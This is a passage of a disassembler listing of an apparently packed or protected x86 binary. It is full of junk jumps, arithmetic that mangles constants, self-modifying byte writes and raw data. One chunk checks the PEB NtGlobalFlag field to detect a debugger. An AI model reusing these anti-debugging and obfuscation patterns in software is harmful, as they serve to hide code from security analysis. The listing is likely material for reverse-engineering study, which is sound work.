; END OF FUNCTION CHUNK	FOR sub_48CAC2
; ---------------------------------------------------------------------------
		align 4
		dd 0C300h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_48C1B0:				; CODE XREF: sub_48CAC2+181j
		jmp	loc_48B44B
; END OF FUNCTION CHUNK	FOR sub_48CAC2
; ---------------------------------------------------------------------------
		db 2 dup(0), 0FFh
; ---------------------------------------------------------------------------
		adc	eax, offset dword_45C0C0
		push	48B47Ah
		jmp	locret_48BAFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C1C7:				; CODE XREF: sub_48DE75-4655j
		mov	byte ptr [ecx],	8Bh
		pop	ecx
		call	loc_48EB76
		add	cl, ch
		db	3Eh
		adc	[eax], eax
		add	[ecx+eax*8-1216ED39h], bl
		adc	eax, [eax]
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48C1E0:				; CODE XREF: eu81y7qg:0048DB92j
		and	eax, 8FB2B575h
		push	offset word_48DEC6
		jmp	locret_48DEBE
; ---------------------------------------------------------------------------
		dd 1EE85300h, 87FFFFF4h, 68582404h, 0E019E4D1h,	1EBFE95Ah
		dd 0C0810000h, 0B90E0EC0h
; ---------------------------------------------------------------------------
		push	edx
		mov	edx, eax
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C20F:				; CODE XREF: sub_48DE75:loc_48E3B2j
		xchg	edx, [esp+0]
		push	ebp
		mov	ebp, esi
		xchg	ebp, [esp+4+var_4]
		push	8DF68256h
		jmp	loc_48CF6D
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 487h
		dd 1A95824h, 0F000000h,	0FFE5AE84h, 58F64FFh, 0
		dd 0FFF4F4E8h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_568. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
		jmp	loc_48CB38
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
		dd 0A87568F6h, 9BC681D3h, 0E9731C5Bh, 0FFFFED8Bh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C258:				; CODE XREF: sub_48DE75+6E9j
		xchg	edx, [esp+8+var_8]

loc_48C25B:				; CODE XREF: eu81y7qg:0048DCFDj
		pop	edx
		push	esi
		push	49DE6672h
		pop	esi
		xor	esi, 0BD685582h
		add	esi, 8D0B0967h
		xor	esi, 6735C9Bh
		jmp	loc_48E1FC
; END OF FUNCTION CHUNK	FOR sub_48DE75

; =============== S U B	R O U T	I N E =======================================



sub_48C27A	proc near		; CODE XREF: eu81y7qg:0048B795p

; FUNCTION CHUNK AT 0048A44D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048A989 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048BFC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BFFD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048D0FA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048D7B7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048DA29 SIZE 00000013 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cld
		jmp	loc_48DA29
sub_48C27A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0E8A2E800h, 0FFFFh, 70A9008Bh, 0E9000000h, 0FFFFE6BDh
		dd 0FFFAB3E8h, 0C60000FFh, 0C15E0306h, 0F18116C1h, 8F020422h
		dd 0A568C188h, 0E90048DAh, 0FFFFD975h
		db 0
byte_48C2B9	db 0C6h, 6, 87h		; DATA XREF: eu81y7qg:loc_48B661o
		db 5Eh,	8Bh, 0E5h
byte_48C2BF	db 87h			; DATA XREF: eu81y7qg:0048BA8Fo
		dd 0EA8B2414h, 8B241C87h, 0E7CEE9D3h, 0C3FFFFh,	249AE9h
		dd 0E4CD8100h, 0E9274305h, 0FFFFF830h

; =============== S U B	R O U T	I N E =======================================



sub_48C2E0	proc near		; CODE XREF: sub_48D160+9p
					; eu81y7qg:0048DAD7j
		xchg	edi, [esp+0]
		pop	edi
		call	ds:dword_45C0C0	; ExitProcess
		jmp	loc_48B542
sub_48C2E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		dd 2404A600h, 0E9585950h, 2952h, 0F6E99900h, 87FFFFE1h
; ---------------------------------------------------------------------------
		adc	al, 24h
		pop	edx

loc_48C307:				; CODE XREF: eu81y7qg:0048D23Bj
		push	eax
		mov	eax, ecx
		jmp	loc_48E58F
; ---------------------------------------------------------------------------
		db 0D1h
		dd 0DF34E9EBh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48C317:				; CODE XREF: sub_48DD69:loc_48B22Cj
		xor	esi, 0C71070D4h
		add	esi, 4F042C60h
		test	ecx, esi
		pop	esi
		jmp	loc_48E6F5
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		db 99h
		dd 0FFE4CFE9h, 9D0000FFh, 0A06FC381h, 91E9BA1Fh, 0Dh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_560. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48EB80

loc_48C342:				; CODE XREF: sub_48EB80+8j
		jmp	loc_4895E8
; END OF FUNCTION CHUNK	FOR sub_48EB80
; ---------------------------------------------------------------------------
		align 4
		dd 0FFF9AEE9h
		db 0FFh
; ---------------------------------------------------------------------------
		jo	loc_48EC55	; DATA XREF: sub_48AEB5:loc_48DC45o
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, ebp
		jmp	loc_48EC50
; ---------------------------------------------------------------------------
		dd 87D1F700h, 505A2414h, 48B15E68h, 1A09E900h, 0
; ---------------------------------------------------------------------------

loc_48C374:				; DATA XREF: sub_48DE75-3917o
		mov	byte ptr [edx],	64h
		pop	edx
		call	loc_48E38E
		mov	eax, large fs:30h
		mov	eax, [eax+68h]
		push	offset byte_48D171
		jmp	loc_48D983
; ---------------------------------------------------------------------------
byte_48C391	db 87h,	34h, 24h	; DATA XREF: sub_48C617:loc_48D3B9o
		dd 1AF3E8h, 3000000h, 0D3FCE8DDh, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48C3A4:				; CODE XREF: sub_48B559+4BEj
		jmp	loc_48DADC
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		db 2 dup(0), 13h
		dd 2565E9CFh, 68000000h, 48C6BCh, 2FCE9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C3BD:				; CODE XREF: sub_48DE75:loc_48AC50j
		pop	edi
		rol	ecx, 10h
		jnb	loc_48AFD2
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
		dd 45830F00h, 0BF00000Ah, 0BB1E5B5Eh, 0FFEBF7E9h, 840F00FFh
		dd 0FFFFEC94h, 0FFE68FE9h, 0CA8100FFh, 55924EDBh, 0CD06EA81h
		dd 0F281FF3Bh, 91715521h, 0FFE403E8h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C3FF:				; CODE XREF: eu81y7qg:0048D3F5j
		jmp	near ptr byte_48B6B9+2
; ---------------------------------------------------------------------------
		jmp	locret_48EB40
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_595. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48C40C:				; CODE XREF: eu81y7qg:loc_48A60Fj
		add	ecx, 24FC519h

loc_48C412:				; DATA XREF: sub_48DE75-3590o
		and	al, 0Ch
		and	al, 0C3h
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48C418:				; CODE XREF: eu81y7qg:0048EA4Aj
		jmp	locret_48CB2F
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 2A3Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B985

loc_48C426:				; CODE XREF: sub_48B985+Cj
		jmp	loc_48E014
; END OF FUNCTION CHUNK	FOR sub_48B985
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48C42B:				; CODE XREF: sub_48CF7E+4j
					; eu81y7qg:0048E6CEj
		mov	edx, [eax]
		or	edx, edx
		jmp	loc_48C5B6
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		dd 18C0F00h, 9900000Ch,	0FFD9CFE9h, 0ECC881FFh,	0E9767B5Eh
		dd 0FFFFE51Eh, 0C30000h
; ---------------------------------------------------------------------------

locret_48C450:				; CODE XREF: eu81y7qg:0048A8AFj
		retn
; ---------------------------------------------------------------------------
		jmp	loc_489D58
; ---------------------------------------------------------------------------
		align 4
		cdq
		jmp	sub_48BB49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48C45E:				; CODE XREF: sub_48A315:loc_48EACBj
		and	esi, 9AF46A5Ah
		xor	esi, 0EB373F68h
		add	esi, 16D5C0F4h
		jmp	loc_48BACA
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		align 2
word_48C476	dw 0CD68h		; DATA XREF: sub_48DE75+59Bo
		dd 5ADBCE94h, 725E281h,	0C2811A2Fh, 319F6A99h, 0FFFF59E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48C48E:				; DATA XREF: sub_48E7D7-41AFo
		add	[edi+68h], dl
		mov	ebp, 5FAFE088h
		sub	edi, 0B526190Bh
		or	edi, 0F12D6BA7h
		add	edi, 4892ECFh
		jmp	loc_48C503
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 3F68108Bh, 0E90048B4h, 0FFFFEF7Bh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C4BD:				; CODE XREF: sub_48DE75-3037j
		jnz	loc_489952
		add	cl, ch
		xchg	ebx, [ecx]
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
		dd 4DF88100h, 0E9FE14FCh, 0FFFFEB4Ch, 87240C87h, 0CE8B2434h
		dd 0BD2F685Eh, 0C8E90048h, 0FFFFE3h
		db 0
; ---------------------------------------------------------------------------

locret_48C4E9:				; CODE XREF: eu81y7qg:0048B1AEj
		retn
; ---------------------------------------------------------------------------
		align 4
		add	eax, 6C8C801h
		xchg	eax, [esp]
		jmp	loc_48D9F9
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 0AD5E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48C503:				; CODE XREF: eu81y7qg:0048C4A8j
		jmp	near ptr byte_489E91+2
; ---------------------------------------------------------------------------
		dd 2952E800h, 0E9550000h, 1B88h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48C515	proc near		; DATA XREF: sub_48DE75-34F7o

; FUNCTION CHUNK AT 0048B82E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048E897 SIZE 00000005 BYTES

		push	ebx
		mov	ebx, offset dword_48BB30
		jmp	loc_48E897
sub_48C515	endp

; ---------------------------------------------------------------------------
		dd 0CFE68100h, 0F349246h, 0FFFAF58Dh, 0E9D885FFh, 1335h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A0B7

loc_48C536:				; CODE XREF: sub_48A0B7:loc_48BBF3j
		push	offset loc_48EA43
		jmp	nullsub_577
; END OF FUNCTION CHUNK	FOR sub_48A0B7
; ---------------------------------------------------------------------------
		dd 0C1030000h, 0D3936859h, 0BFE90048h, 3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C550:				; CODE XREF: sub_48DE75+115j
		mov	ecx, ebx
		pop	ebx
		or	edx, 676C83C1h
		add	edx, 0E81AE921h
		add	edx, ebp
		add	edx, 0A0788B0Eh
		jmp	loc_48B12E
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F9

loc_48C56D:				; CODE XREF: sub_48D1F9-645j
		mov	byte ptr [ebx],	0Fh
		pop	ebx
		call	sub_48DE25
		add	cl, ch		; CODE XREF: eu81y7qg:0048DDD4j
		mov	edx, 11h
		add	cl, ch
		xchg	eax, ecx
		call	near ptr 49C584h
; END OF FUNCTION CHUNK	FOR sub_48D1F9
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48C585:				; CODE XREF: sub_48CB88+6j
		jmp	loc_48D83E
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C58C:				; CODE XREF: sub_48DE75-214Dj
		jmp	loc_48BECE
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48C593:				; CODE XREF: eu81y7qg:loc_48CD89j
		retn
; ---------------------------------------------------------------------------
		dd 7A24FA81h, 0F5E966F7h, 0FFFFE8h, 99E9288Bh, 8700000Eh
		dd 0E85B241Ch, 0FFFFEDEEh
		db 0
; ---------------------------------------------------------------------------

loc_48C5B1:				; CODE XREF: eu81y7qg:0048CE78j
		jmp	locret_48B13A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48C5B6:				; CODE XREF: sub_48CF7E-B4Fj
		jz	loc_48C84C
		jmp	loc_48A4BA
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		align 2
		mov	byte ptr [ecx],	0C3h
		pop	ecx
		push	offset loc_48CC16
		jmp	loc_48E2EA
; ---------------------------------------------------------------------------
		dd 8BF92300h, 225FE9C8h, 841B0000h, 0FFFFD6B7h,	0FFD113E8h
		dd 0C60000FFh, 685B8D03h, 8D564BA4h, 0D4E6815Eh, 0D173DA13h
		dd 0D7CAE9C6h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48C5FE:				; CODE XREF: eu81y7qg:0048DD75j
		js	loc_48DB4F
		shr	esi, 1Dh
		and	ebp, ebx
		pop	ebx
		xor	ebx, 840E0908h
		jmp	loc_489885
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48C617	proc near		; CODE XREF: eu81y7qg:0048CAEAp

; FUNCTION CHUNK AT 0048CF15 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D3B9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D8CD SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		mov	esi, edi
		jmp	loc_48CF15
sub_48C617	endp

; ---------------------------------------------------------------------------
		align 4
		dd 9D706800h, 348702A5h, 5EFE8B24h, 0E793F781h,	6851C562h
		dd 2BF975E6h, 0FFD881E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C642:				; CODE XREF: sub_48DE75:loc_48CB4Fj
		jge	near ptr dword_48A258+0Bh
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A70F

loc_48C649:				; CODE XREF: sub_48A70F-D38j
		jmp	nullsub_563
; END OF FUNCTION CHUNK	FOR sub_48A70F
; ---------------------------------------------------------------------------
		align 10h
		dd 0E91BE6C1h, 0FFFFDC09h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C659:				; CODE XREF: sub_48DE75:loc_48A95Bj
		push	esi
		call	near ptr dword_489B3C+2
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
		dd 24048700h, 22EE8h, 0D8E90000h, 0FFFFE5h
		db 0
; ---------------------------------------------------------------------------

loc_48C671:				; CODE XREF: eu81y7qg:0048A9A3j
		call	sub_48DD69
		mov	eax, ebx
		pop	ebx
		or	eax, 64EC2A4Ah
		rol	eax, 1
		or	eax, 0D5B763BFh
		push	edi
		push	0C7C46E28h
		jmp	loc_48D92C
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48C693	proc near		; CODE XREF: eu81y7qg:loc_48B061p
					; eu81y7qg:0048D544j

; FUNCTION CHUNK AT 00489554 SIZE 00000019 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	esi
		push	0FF461CDFh
		jmp	loc_489554
sub_48C693	endp

; ---------------------------------------------------------------------------
		align 4
		dd 0E8240487h, 0FFFFD589h, 0F6B95100h, 0E90048D5h, 0E0Ch
		dd 0C300h, 3100D868h, 0CE815E73h, 5DCED62Bh, 0C2F1BF57h
		dd 3E90048h, 28h, 240C8700h, 5DB95159h,	0E90048CBh, 0FFFFD157h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C6E5:				; CODE XREF: sub_48DE75:loc_48BB93j
		mov	edx, 0F1F2F4F8h
		xor	eax, eax
		call	loc_48B791
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
; ---------------------------------------------------------------------------
		sbb	al, 24h
		pop	ebx
		js	loc_48D8E1
		jnz	loc_48B8BD
		push	edx
		mov	edx, ebp
		jmp	loc_48E5B7
; ---------------------------------------------------------------------------
		mov	eax, 61h
		push	ebx
		push	82018D63h
		pop	ebx
		rol	ebx, 1Fh
		and	ebx, 47B8C32Dh
		add	ebx, 579A7093h
		or	ebx, 0FB593557h
		jmp	loc_48E926
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48C733:				; CODE XREF: sub_48AEB5-1654j
		pop	esi
		xor	esi, 0A05DA446h
		add	esi, 31B8A0C7h
		popf
		xchg	esi, [esp+4+var_4]
		jmp	loc_48B38C
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE6F

loc_48C74B:				; CODE XREF: sub_48BE6F:loc_48EB43j
		mov	ebx, edx
		pop	edx
		add	ebx, 0BC1A5546h
		sub	ebx, 40AD5E5Ch
		and	ebx, 3E5FA364h
		jnz	loc_48E138
		jge	loc_4894EC
		mov	edx, edi
		jmp	loc_4894E6
; END OF FUNCTION CHUNK	FOR sub_48BE6F
; ---------------------------------------------------------------------------

loc_48C773:				; CODE XREF: eu81y7qg:0048DA5Aj
		call	loc_48EBEF
		and	eax, 0F34F0888h
		not	edx
		xor	eax, ecx
		cdq

loc_48C783:				; CODE XREF: eu81y7qg:loc_48EDEAj
		jnz	loc_48BA88
		jmp	loc_48C011
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_591. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
		dd 8CF81568h, 0C88158C5h, 689085E1h, 0C258C081h, 8EE8E839h
		dd 0F000000h, 151887h, 0D83FE900h, 0C600FFFFh, 815B8B03h
		dd 524AABC0h, 9008BB6h,	5E850FC0h, 0E9FFFFEFh, 0FFFFEF54h
		dd 5651C081h, 4879730h,	0EC5FE924h, 0E800FFFFh,	5FBh
		db 2 dup(0), 0C3h
byte_48C7E3	db 0Fh			; DATA XREF: sub_48D1F9-64Ao
		dd 2D985h, 2C5E800h
		db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_585. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FFFFBEE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C7F7:				; CODE XREF: sub_48DE75:loc_489B89j
		jmp	loc_48C8F4
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
word_48C7FE	dw 0D029h		; DATA XREF: sub_48B3C5:loc_48E8F9o
		dd 0EC83840Fh, 0AD68FFFFh, 0E90048C6h, 148Ch, 0A1B5C581h
		dd 880F2D11h, 0FFFFE9B1h, 0FFE6E1E9h, 0C30000FFh, 27C1F700h
		dd 0E9E45535h, 1711h, 0EDC10000h, 2414870Ch, 56F8815Ah
		dd 0E97C7CA2h, 0FFFFD086h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C846:				; DATA XREF: sub_48CEBF:loc_48A8D2o
		pop	eax
		jmp	loc_48DC6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48C84C:				; CODE XREF: sub_48CF7E:loc_48AFFDj
					; sub_48CF7E:loc_48C5B6j
		call	sub_48F051
		push	offset byte_48C0B8
		jmp	loc_48A167
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		align 4
		dd 558700h, 0FFE09BE9h,	87C300FFh, 87582404h, 0EE8B2434h
		dd 0FFD05CE9h, 82E99CFFh, 22h, 778B0F00h, 87FFFFF3h, 1487240Ch
		dd 5ACA8B24h, 3817A168h, 62E95950h, 87FFFFE0h, 0C872414h
		dd 59D18B24h, 17E9EC8Bh
		db 0Ch
		db 2 dup(0), 87h	; CODE XREF: sub_48A24C:loc_48C91Cj
		dd 0C65E2434h, 0E85F9D07h, 0FFFFE7D8h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C8B5:				; CODE XREF: sub_48DE75-A94j
		jmp	loc_48D356
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
byte_48C8BB	db 87h			; DATA XREF: sub_48A5B4+2635o
		dd 0FA8B2414h
		db 5Ah
byte_48C8C1	db 0Fh,	84h, 0D0h	; DATA XREF: sub_48A5B4+B27o
; ---------------------------------------------------------------------------
		sar	edi, cl
		jmp	fword ptr [eax-5Eh]
; ---------------------------------------------------------------------------
		db 33h,	36h, 9
		dd 0FFDE9FE9h, 0F70000FFh, 0FA840FD6h, 81FFFFD8h, 0E2509CF6h
		dd 0DC6C123h, 7F17EE81h, 2968E05Eh, 0E90048D1h,	0FFFFF768h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C8F4:				; CODE XREF: sub_48DE75:loc_48C7F7j
		jge	loc_48B3FB
		add	[ebx], al
		fiadd	dword ptr [ebp-15141627h]
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 0FFFFh
; ---------------------------------------------------------------------------
		mov	eax, edi
		xchg	eax, [esp]
		call	sub_48AC21
		jmp	locret_48DF30
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFD58Eh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C91A:				; CODE XREF: eu81y7qg:0048CF45j
		pop	edx
; ---------------------------------------------------------------------------
		db 81h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A24C

loc_48C91C:				; CODE XREF: sub_48A24C+26F8j
		repne jo short near ptr	byte_48C8A5
		fimul	word ptr [edi+48CDC268h]
		add	cl, ch
		xchg	eax, esp
		add	al, 0
; END OF FUNCTION CHUNK	FOR sub_48A24C
; ---------------------------------------------------------------------------
		dw 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48C92D:				; CODE XREF: sub_48DE75:loc_48DEC0j
		pop	eax
		jmp	loc_48BDA3
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B528

loc_48C937:				; CODE XREF: sub_48B528+26F7j
		jmp	near ptr dword_48A9C8+23h
; END OF FUNCTION CHUNK	FOR sub_48B528
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A24C

loc_48C93D:				; CODE XREF: sub_48A24C:loc_48CFE8j
		call	loc_48BB81
		add	al, ch		; CODE XREF: sub_48DE75:loc_48E3F6j
		jz	short loc_48C91C
; END OF FUNCTION CHUNK	FOR sub_48A24C
; ---------------------------------------------------------------------------
		dw 0FFFFh
; ---------------------------------------------------------------------------
		jmp	loc_48EE1F
; ---------------------------------------------------------------------------
		sub	ecx, 0C7182393h
		jmp	loc_48EB95
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BB49

loc_48C95A:				; CODE XREF: sub_48BB49:loc_48A5A7j
		call	near ptr dword_48A1F4+2Fh
; END OF FUNCTION CHUNK	FOR sub_48BB49
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48C960:				; CODE XREF: eu81y7qg:00489CD1j
		retn
; ---------------------------------------------------------------------------
		align 2
		jmp	locret_48D4E9
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48C96B:				; CODE XREF: eu81y7qg:loc_48D53Aj
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48C96D:				; DATA XREF: eu81y7qg:0048A793o
		add	edx, ebp
		push	offset word_48AB5E
		jmp	locret_48CD96
; ---------------------------------------------------------------------------
		db 2 dup(0), 13h
		db 0DFh

; =============== S U B	R O U T	I N E =======================================



sub_48C97D	proc near		; CODE XREF: eu81y7qg:loc_48CAA1p

arg_4		= dword	ptr  8

		xchg	ecx, [esp+0]
		xchg	eax, [esp+0]
		mov	ecx, eax
		pop	eax
		pop	edi
		xchg	ebp, [esp-8+arg_4]
		push	ebp
		jmp	near ptr byte_489C85+2
sub_48C97D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0D3B85000h, 0E90048E9h, 11B0h
		db 0
; ---------------------------------------------------------------------------

loc_48C99D:				; CODE XREF: eu81y7qg:00489DACj
		jz	loc_48B0B7
; ---------------------------------------------------------------------------
		db 0
		dd 2DCF8100h, 0E97090CFh, 0FFFFE700h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C9B2:				; CODE XREF: eu81y7qg:0048B908j
		cmp	ebx, ecx
		jmp	loc_48CEFA
; ---------------------------------------------------------------------------
		db 2 dup(0)
		db 0C1h	; Á
		db 0C0h	; À
		db    8
		db  81h	; 
		db 0F0h	; ð
		db 0B1h	; ±
		db 0F6h	; ö
		db 0F0h	; ð
		db  2Ch	; ,
		db 0E8h	; è
		db 0FCh	; ü
		db 0E9h	; é
		db 0FFh
		db 0FFh
		db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------
		mov	[eax], edx
		jmp	loc_48EE08
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48C9D4:				; CODE XREF: sub_48DD69:loc_48E6F5j
					; eu81y7qg:0048E716j
		add	ecx, 0DEF91F16h
		and	ecx, 0F700632Bh
		call	loc_48DD1A
		jmp	loc_48CED4
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		align 4

loc_48C9EC:				; CODE XREF: eu81y7qg:0048D587j
		xchg	eax, [esp]
		pop	eax
		add	ecx, 0A05F31DAh
		popf
		jmp	loc_48E980
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_562. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_4894C2

loc_48C9FE:				; CODE XREF: sub_4894C2+1Fj
		jmp	locret_48E12F
; END OF FUNCTION CHUNK	FOR sub_4894C2
; ---------------------------------------------------------------------------
		align 4
		dd 8B240C87h, 242C87E9h, 0E90EC9C1h, 0FFFFE082h, 89FA8100h
		dd 0E97B2BD2h, 65Eh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CA8B

loc_48CA21:				; CODE XREF: sub_48CA8B+7j
		mov	byte ptr [ecx],	8Bh
		pop	ecx
		mov	ecx, offset byte_48DFF9
		jmp	loc_48E611
; END OF FUNCTION CHUNK	FOR sub_48CA8B
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48CA30	proc near		; DATA XREF: sub_48DE75+4A9o

; FUNCTION CHUNK AT 00489E8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A643 SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		mov	ecx, offset loc_48B12E
		jmp	loc_489E8C
sub_48CA30	endp

; ---------------------------------------------------------------------------

loc_48CA3D:				; CODE XREF: eu81y7qg:0048AE70j
		jb	loc_48E091
		jnz	loc_48BA34

loc_48CA49:				; CODE XREF: eu81y7qg:0048AE67j
		or	eax, 0E8F495A8h
		add	eax, 70B4A4Ah
		xchg	eax, [esp]
		pushf
		push	0C30586D4h
		pop	eax
		jmp	loc_48A04F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CA65:				; CODE XREF: sub_48DE75+61Dj
		add	ecx, 44DAA49Ch
